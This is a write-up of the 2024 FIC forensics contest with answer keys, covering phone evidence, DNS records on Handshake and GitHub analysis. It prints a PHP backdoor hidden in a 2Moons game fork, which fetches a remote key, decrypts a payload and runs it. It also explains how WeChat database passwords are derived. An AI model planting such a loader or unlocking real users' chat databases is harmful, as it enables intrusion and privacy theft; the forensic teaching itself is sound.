2024FIC复盘

密码：3x@9Qm!V8e$vL%6d^Yr5o*C#Nk7h&ZpFbW2sG4jXuD1cO0lTgAqHwRnIzJyM-_+K=

介质取证

C

18877332134

在某个便签中全选

tcgg123456
在手机中找到秘钥环，打开google密码管理可以看到

4.0.0.21

AB

sunlogin_service.log.2

116.192.161.222:2577

received public ip 116.192.161.222:2577

important.docx

solution

导入火眼发现其中有个文件：important.xml导出后打开发现是jpg文件

自传小说.MP3

A

北京大学

wang

棋牌室

071492

取每一段音频的首字, 拼接起来得到 我得银行密马事凌起一四就而 = 我的银行密码是071492.

我叫李安宏...
得到毕业证书后...
银色的流星划过天际...
行家啊...
密聊中...
马上我们相约在香格里拉大酒店...
事后...
凌伍诚(音)便是这这时候...
起初...
一次次这样...
四楼的车库里...
就是些交易的场面...
而每当这个念头浮现...

手机

Redmi 6 Pro

也可查IMEI

1qaz2wsx

在手机备忘录的database中找到

爱能不能够永远单纯没有悲哀

见题2图片，接头暗号指向一张图片ub690t1mq9kelnah.png

{"note":[{"format":"HEADING","text":"接头暗号"},{"format":"IMAGE","text":"ub690t1mq9kelnah.png"},{"format":"CHECKLIST_UNCHECKED","text":"说上述暗号"},{"format":"CHECKLIST_CHECKED","text":"地点：香格里拉大酒店大堂"},{"format":"CHECKLIST_CHECKED","text":"黑皮鞋"},{"format":"CHECKLIST_CHECKED","text":"系领带"},{"format":"CHECKLIST_CHECKED","text":"穿西装"}]}

在图片中搜索

1qaz2wsx3edc

在便签的数据库中找到

2026-02-26

EnMicroMsg.db

1864810197

打开/data/com.tencent.mm/shared_prefs/com.tencent.mm_preferences.xml 看到uin

31ad809

• 微信数据库是由设备的IMEI拼接用户UIN计算MD5后，取前7位作为密码
• 如果微信在创建数据库时没有获取到 IMEI 信息, 则会使用 1234567890ABCDEF 代替 IMEI. 这种情况下 auth_info_key_prefs.xml 文件中会缺少 IMEI 信息.

因为本题中微信并没有获取到 IMEI 信息, 因此只用计算 md5("1234567890ABCDEF"+UIN) 即可.

3170010703

分析聊天记录可以知道图片里有个电话是解压密码

查看源文件发现同文件有两张一样的图片，有一张隐约有二维码

使用stegonline分离一下

使用QRresearch得到电话（要去掉开头的1）：3170010703

83da62aabc88cb1b23e9469142b67b80

#!@KE2sax@!da0h5hghg34&@

李安弘

80000

互联网（Web3）

tips

DNS ( Domain Name Service)

DNS Zone，DNS域，被用来划分DNS主域。传统的DNS域类似一个树状的结构，被分成不同的区域，这些区域可区分一个DNS服务器中命名空间中不同的区域。

常见的资源记录类型：

A ：Address地址， IPv4

AAAA：Address地址 IPv6

NS ：Name Server域名服务器

• 名称服务器（如ns1.varo）是负责管理域名DNS记录的服务器。当用户访问.foren6时，系统会向ns1.varo查询该域名对应的IP地址、子域名、邮箱配置等信息。
• 用于确定哪些服务器（注意不是单个服务器）为一个局域网传递DNS信息以及确定域名由哪个服务器进行解析。

SOA：Start of Authority 起始授权机构

MX：Mail Exchanger 邮件交换

CNAME：Canonical Name规范名

• CNAME是DNS记录的一种类型，用于将一个域名（别名）指向另一个域名（规范名），而非直接指向IP地址。

记录类型	作用	示例
CNAME	别名 → 规范域名	www → example.com
A	域名 → IPv4地址	example.com → 1.2.3.4
AAAA	域名 → IPv6地址	example.com → 2001:db8::1
MX	邮件服务器地址	example.com → mail.example.com
TXT	文本信息（如SPF、DMARC记录）	example.com → "v=spf1..."

PTR：Pointer 指针，即反向DNS系统，用于查询IP地址时给出相关的域名，即查询IP地址的PTR记录给出该IP指向的域名，在 Zone 文件中被设置；

TXT：Text，网络名称系统的记录，可讲文字信息提供给网络意外的来源，其中有一个非常重要的功能就是当外部查询需要显示BIND的相关版本号时，可以指定 TXT查询，这个配置是默认的；谷歌会使用 TXT 记录来验证网站的拥有权以及确保电子邮件的安全；

SRV：Service 记录，域名中用于指定服务器并提供服务的位置：主机好、端口号；一般在 Zone File 中被定义；SRV 被用来记录服务器提供什么样的服务。

FQDN(Fully Qualified Domain Name) 完全合格域名/全程域名，即域名可以通过DNS进行解析，其公式 FQDN = HostName + Domain。

• 这门技术解决了一个多个主机的问题，一个网站或者服务器集群一般都是有多个主机一起协作的，比如说包括正向代理服务器、反向代理服务器、Web服务器、Email服务器、OA服务器、FTP服务器等等，这个时候就涉及是不是需不需要为每一个主机申请一个域名。 有了这个技术之后每一个主机都可以自己申请一个 Hostname 来区别于其他的主机，这个时候就只需要一个域名就可以做到管理所有的主机。
• 比如我申请了一个域名: doheras.com
  • 现在我有两个服务器需要用到这个域名，一个 FTP服务器，一个Web服务器，这两个服务器都需要用到 doheras.com这个域名，根据公式，我们知道可以采用 hostname 的方式来访问不同的主机：
  • Web 服务器: web.doheras.com
  • FTP 服务器: ftp.doheras.com
  • 因此， FQDN 服务可以简化在服务和应用中的配置流程，提高配置文件的可维护性。
• 在配置DNS的过程中，因为服务端的工作在UDP协议端口53上，DNS需要FQDN提供正向解析 （FQDN –> IP）以及反向解析 (IP –> FQDN) 的服务。

SOA( Start of Authority)

• SOA 又被称作 起始授权机构记录， 被标记成在众多NS记录中哪一台是主服务器。
• SOA 记录表示此域名的权威解析服务器地址，当要查询的域名在所有递归解析服务器没有域名的解析缓存时，会回源到请求此域名的SOA 记录，也叫做权威解析记录。
• SOA 作为所有区域文件的强制性记录，他必须是 ZONE 文件中的第一个记录。

1.请分析检材二，找到李某上游人员陈某博客宣传所用域名为

chen.foren6

2.请分析陈某宣传所用域名，该域名的顶级域名在以下那个区块链注册

B

A.ETH（https://ens.domains/）

B.HNS（https://handshake.org/）

3.请分析陈某宣传所用域名的顶级域名的域名解析服务器（DNS）共有几个

2

chen.foren6是自定义顶级域名，在namebase（Handshake域名注册平台）中查找DNS域，查到两个NS（域名服务器）

也可以按照Linux - HNSDNS documentation修改默认DNS服务器使用dig查询hns解析（kali自带dig）

4.请分析陈某宣传所用域名的顶级域名的NS1服务器ip为

45.79.133.98

可以看到.foren6的CNAME为varo，继续在namebace中查询即可看到ip

也可用dig查询

5.请分析陈某宣传所用域名，该域名DNS记录指向邮件服务器域名为

mail.163.com

6.请分析陈某宣传所用域名，该域名的txt记录中chen的值为

fengbaoliejiu

7.请分析陈某宣传所用域名，该域名DNS记录没有以下那个域名

A、admin.chen.foren6 B、caidan.chen.foren6 C、fic.chen.foren6 D、hl.chen.foren6

只有caidan.chen.foren6解析出ip

8.请分析陈某宣传所用域名，该博客域名最终DNS解析指向的github仓库名为

chewhaoN.github.io

9.请分析陈某github账号，陈某对jkroepke/2Moons项目增改了几个文件

2

把两个项目克隆到本地，删除两个文件夹内的 .git 目录, 使用 git diff 指令, 进行比对:

git diff -- 2Moons 2Moons0 查看文件的差异
$ git diff chewhaoN_2Moons/ jkroepke_2Moons/
diff --git a/chewhaoN_2Moons/encrypted.bin b/chewhaoN_2Moons/encrypted.bin
deleted file mode 100644
index d6a0dce..0000000
--- a/chewhaoN_2Moons/encrypted.bin #陈某增加了一个文件
+++ /dev/null
@@ -1 +0,0 @@
-9T8NBGdXI1Xe46fDOsPmrmuhAD9Rk/XQMRukLHJDXMm9wexBjKY/8QQv1OvxCiA87B0ZQ9kFgQiJ0fCquio0EcK5sWr1yUMYrapSWgUXMbD2/P4Qs9lO1cc53rRgZ8lg5r7d21YJkFFkyKJDMAmEjw==
\ No newline at end of file
diff --git a/chewhaoN_2Moons/includes/libs/Smarty/plugins/block.textformat.php b/jkroepke_2Moons/includes/libs/Smarty/plugins/block.textformat.php
index 359a53f..e9f5fe2 100644
--- a/chewhaoN_2Moons/includes/libs/Smarty/plugins/block.textformat.php#陈某修改了内容
+++ b/jkroepke_2Moons/includes/libs/Smarty/plugins/block.textformat.php
@@ -33,9 +33,8 @@
  * @return string content re-formatted
  * @author Monte Ohrt <monte at ohrt dot com>
  */
-
-   function smarty_block_textformat($params, $content, $template, &$repeat)
-{
+function smarty_block_textformat($params, $content, $template, &$repeat)
+{
     if (is_null($content)) {
         return;
     }
@@ -110,6 +109,4 @@
     } else {
         return $_output;
     }
-    $a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?php\n".$i);include $k;unlink($k);yijuhua();
-
 }

10.请分析陈某 github 账号，陈某在修改 2Moons 过程中提到了什么锅底

蜂蜜锅底

https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css

url解码为：

11.请分析陈某 github 账号，陈某在游戏 2Moons 中放置的后门连接码的密码为

ficnb

可以分析php代码逻辑：

$a = file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');
$b = md5($a, true);  // 生成 MD5 哈希（二进制形式）作为密钥
$c = file_get_contents('../../../../encrypted.bin'); // 读取加密文件
$d = base64_decode($c);  // Base64 解码
$e = 'aes-256-cbc';     // 使用 AES-256-CBC 算法
$f = openssl_cipher_iv_length($e); // 获取 IV 长度（16字节）
$g = substr($d, 0, $f);  // 提取 IV（初始向量）
$h = substr($d, $f);     // 提取加密数据
$i = openssl_decrypt($h, $e, $b, OPENSSL_RAW_DATA, $g); // 解密数据
$j = sys_get_temp_dir(); // 获取系统临时目录
$k = $j . '/func_' . uniqid() . '.php'; // 生成唯一文件名
file_put_contents($k, "<?php\n" . $i);  // 写入解密后的代码
include $k;  // 包含并执行
unlink($k);  // 删除临时文件
yijuhua();   // 调用恶意函数

将远程css文件下载到本地，逆向输出yijuhua()

<?php
$a = file_get_contents('蜂蜜锅底.css');
$b = md5($a, true);
$c = file_get_contents('./encrypted.bin');
$d = base64_decode($c);
$e = 'aes-256-cbc';
$f = openssl_cipher_iv_length($e);
$g = substr($d, 0, $f);
$h = substr($d, $f);
$i = openssl_decrypt($h, $e, $b, OPENSSL_RAW_DATA, $g);
echo $i;

12.请访问陈某当前博客，陈某课程的扫码报名地址的域名为

https://fic.forensix.cn

扫码就行

13.请分析陈某当前博客，通过互联网找到陈某的旧博客网站标题为

柳如烟大战霸天虎

访问forensix2025.work.gd，无法访问，查看Web Archives

Web Archives（网络存档） 是互联网内容的“历史图书馆”，通过定期抓取和保存网页快照，确保即使原始网页被删除、修改或无法访问，其历史版本仍可被查看。

可以看到标题：柳如烟大战霸天虎

14.请分析陈某旧博客，陈某的姓名为

陈浩北

见题13

15.请分析陈某旧博客，陈某的邮箱地址为

mailme@chen.foren6

查看源代码搜索mail或@

16.请分析陈某旧博客，陈某的11位手机号为

13170010703

见题15

17.请分析陈某旧博客，陈某最爱的dota英雄为

邪影芳灵